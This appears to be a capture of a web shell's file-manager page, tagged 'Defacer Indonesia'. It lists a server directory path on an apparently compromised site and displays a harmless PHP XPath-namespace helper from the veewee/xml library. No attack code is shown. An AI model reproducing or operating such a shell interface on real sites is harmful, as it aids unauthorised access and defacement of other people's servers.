whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
veewee
/
xml
/
src
/
Xml
/
Dom
/
Xpath
/
Configurator
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/veewee/xml/src/Xml/Dom/Xpath/Configurator/php_namespace.php
<?php declare(strict_types=1); namespace VeeWee\Xml\Dom\Xpath\Configurator; use Closure; use DOMXPath; use VeeWee\Xml\Xmlns\Xmlns; /** * @return Closure(DOMXPath): DOMXPath */ function php_namespace(): Closure { return static function (DOMXPath $xpath): DOMXPath { namespaces(['php' => Xmlns::phpXpath()->value()])($xpath); return $xpath; }; }
Copyright ©2021 || Defacer Indonesia